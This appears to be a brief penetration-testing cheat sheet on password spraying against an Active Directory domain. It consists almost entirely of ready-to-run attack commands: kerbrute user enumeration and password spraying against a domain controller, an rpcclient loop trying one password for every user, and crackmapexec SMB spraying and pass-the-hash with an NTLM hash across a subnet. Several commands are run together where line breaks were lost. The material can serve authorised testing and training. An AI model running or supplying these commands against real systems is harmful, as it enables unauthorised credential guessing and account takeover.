Spray
Kerbrute
kerbrute userenum -d qu35t.pw --dc 172.17.0.3 users.txtkerbrute passwordspray -d qu35t.pw --dc 172.17.0.3 users.txt 'Summer2022!'ntpdate 10.10.10.10Rpcclient
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.17.0.3 | grep Authority; doneCrackmapexec
crackmapexec smb 172.17.0.3 -u valid_users.txt -p Password123 --continue-on-success | grep +crackmapexec smb --local-auth 172.17.0.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf --continue-on-success | grep +Last updated